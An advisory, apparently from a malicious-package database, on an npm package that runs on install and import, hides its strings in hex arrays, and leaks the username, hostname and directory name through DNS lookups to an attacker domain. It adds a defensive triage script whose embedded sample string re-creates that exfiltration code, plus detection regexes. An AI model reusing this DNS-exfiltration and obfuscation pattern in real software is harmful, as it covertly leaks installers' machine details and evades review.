Malicious package due to code obfuscation, dynamic module loading, process exposure, suspicious install script, and untrustworthy author email.
-= Per source details. Do not edit below this line.=-
This package performs silent reconnaissance against any machine that installs or requires it. The package.json declares scripts.install = node index.js, and index.js also loads lib/core.js at require() time, so the payload runs both on install and on first import. lib/core.js obtains the os and dns modules via module.constructor._load(...) (Module._load, the internal routine that require() itself calls), a deliberate bypass of a simple source grep for require('os') / require('dns'). It then reads os.userInfo().username, os.hostname(), and path.basename(process.cwd()), concatenates them with a timestamp and the hard-coded domain oob.sl4x0.xyz, and calls dns.resolve4() on the resulting subdomain. Because the authoritative nameserver for oob.sl4x0.xyz is attacker-controlled, the victim's recursive resolver delivers that query to the attacker, leaking the username, hostname, and working-directory name as DNS query labels; a lookup of this kind succeeds even where outbound HTTP is blocked, so it is typically visible only in resolver logs. The sensitive identifiers and the domain itself are stored as hex byte arrays in lib/6ad264.js and lib/b02e30.js and reassembled at runtime via String.fromCharCode, and the JS filenames are random hex: clear evasion of static review. Supporting red flags: the author email is research@sl4x0.xyz (the same attacker-owned domain), the version is 99.9.9, and the package description is generic. This is active exfiltration of installer-side data, executed on both install and import, with no legitimate functionality documented.
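As an added example (not code from the reported package or from the ossf/malicious-packages project), the following Node.js script shows how to recover the indicators the description relies on without executing anything from the tarball: it lists lifecycle scripts from package.json, decodes small-integer array literals back to the strings they hide, and flags the dynamic-loading, String.fromCharCode and DNS-lookup calls. The package.json and JS text it scans are constructed stand-ins that imitate the described pattern, not the real lib/core.js or lib/6ad264.js; the package name example-sdk is a placeholder.

```javascript
// Added example: static triage for the evasion pattern described above.
// Not code from the reported package. The two SAMPLE_* inputs are constructed
// to imitate the described pattern (byte arrays rebuilt with String.fromCharCode,
// modules fetched via module.constructor._load, DNS-label exfiltration).

const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-sdk", // constructed placeholder name
  version: "99.9.9",
  scripts: { install: "node index.js" },
});

const SAMPLE_OBFUSCATED_JS = `
const a = [0x6f, 0x73];
const b = [0x64, 0x6e, 0x73];
const d = [0x6f,0x6f,0x62,0x2e,0x73,0x6c,0x34,0x78,0x30,0x2e,0x78,0x79,0x7a];
const s = (arr) => String.fromCharCode(...arr);
const os = module.constructor._load(s(a));
const dns = module.constructor._load(s(b));
const label = [os.userInfo().username, os.hostname()].join(".");
dns.resolve4(label + "." + s(d), () => {});
`;

// npm lifecycle hooks that execute on the installing machine.
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Return [name, command] pairs for lifecycle scripts declared in package.json.
function lifecycleScripts(pkgJsonText) {
  const scripts = JSON.parse(pkgJsonText).scripts || {};
  return LIFECYCLE.filter((k) => k in scripts).map((k) => [k, scripts[k]]);
}

// Find array literals made only of small integers (hex or decimal) and decode
// those that form printable ASCII. This reverses the byte-array trick statically.
function decodeByteArrays(src) {
  const num = "(?:0x[0-9a-fA-F]{1,2}|\\d{1,3})";
  const re = new RegExp(`\\[\\s*(${num}(?:\\s*,\\s*${num})*)\\s*\\]`, "g");
  const out = [];
  for (const m of src.matchAll(re)) {
    const bytes = m[1].split(",").map((t) => Number(t.trim()));
    if (bytes.length >= 2 && bytes.every((b) => b >= 0x20 && b <= 0x7e)) {
      out.push(String.fromCharCode(...bytes));
    }
  }
  return out;
}

// Source-level indicators named in the report, matched with plain regexes.
const INDICATORS = [
  ["dynamic module load via module.constructor._load", /module\.constructor\._load\s*\(/],
  ["string reassembly via String.fromCharCode", /String\.fromCharCode\s*\(/],
  ["DNS lookup of a built hostname", /\.resolve4?\s*\(/],
  ["host fingerprinting via os.userInfo/os.hostname", /\.(?:userInfo|hostname)\s*\(/],
];

function findIndicators(src) {
  return INDICATORS.filter(([, re]) => re.test(src)).map(([name]) => name);
}

// Combine the three checks into one verdict for an extracted tarball.
function triage(pkgJsonText, sources) {
  const scripts = lifecycleScripts(pkgJsonText);
  const indicators = [...new Set(sources.flatMap(findIndicators))];
  const decoded = sources.flatMap(decodeByteArrays);
  // A decoded string shaped like a hostname is the hidden callback domain.
  const hasDomain = decoded.some((s) => /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i.test(s));
  return {
    scripts,
    indicators,
    decoded,
    // install hook + hidden domain + at least two code indicators is the
    // combination the report describes
    suspicious: scripts.length > 0 && hasDomain && indicators.length >= 2,
  };
}

console.log(JSON.stringify(triage(SAMPLE_PACKAGE_JSON, [SAMPLE_OBFUSCATED_JS]), null, 2));
```

Run with node; in practice, feed it the package.json and every .js file from the extracted tarball instead of the constructed samples. The regexes only catch the specific forms named in the report (other obfuscators will differ), so treat a hit as a reason to open the file, not as a verdict, and compare file hashes against the evidence_files entries below.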
{
  "malicious-packages-origins": [
    {
      "modified_time": "2026-04-07T14:24:50Z",
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "sha256": "6f323b1bbcb702f6ba95647783f3bb722e75b2c8324aadb6e42f0580529591b0",
      "source": "amazon-inspector",
      "import_time": "2026-04-07T14:39:15.165559355Z"
    },
    {
      "modified_time": "2026-05-12T19:03:07Z",
      "versions": [
        "99.9.9"
      ],
      "sha256": "51b9fa22264e38705c3a7ba319515ee66036e72ab14c32d08b01a5695aa191b8",
      "id": "IN-MAL-2026-002362",
      "source": "amazon-inspector",
      "import_time": "2026-05-13T20:10:56.299458224Z"
    }
  ]
}
{
  "evidence_files": [
    {
      "sha256": "d24415d02b2768deed6613ba41e3837825889459718a582d352a0805d40a321c",
      "tlsh": "d0f02d69b393c48f97e096d0360a53d18559c3c0e7cf8195fb7c4a87904e7d1ca85a55",
      "path": "lib/core.js"
    },
    {
      "sha256": "f7942b52b33a05f44ce43c1cc581fa1140cbbef03acdba961ade9f4a44cb03e1",
      "tlsh": "73f0595166a3d19f77d69ac35f4190a0acb60a40b60ed0d5fa2c1bde00eeb13e9c54b0",
      "path": "lib/6ad264.js"
    }
  ],
  "package_integrity": [
    {
      "hashes": {
        "sha512_sri": "sha512-cfO0fgspdySVZZXUeDwtKXdHnDhxuHyPLZkZ3N5lKo6AiZ1uhWp9iTjz3AFp0RIwn4GT6R4PoqhmdN7rKvnRIQ==",
        "sha1": "ad55d8db474615959fda9274cf3b72a4cce0c7b9"
      },
      "filename": "itg-renderer-sdk-99.9.9.tgz"
    }
  ]
}
[
  {
    "description": "The product contains code that appears to be malicious in nature.",
    "name": "Embedded Malicious Code",
    "cweId": "CWE-506"
  }
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@ceeferenderer/itg-renderer-sdk/MAL-2026-2407.json"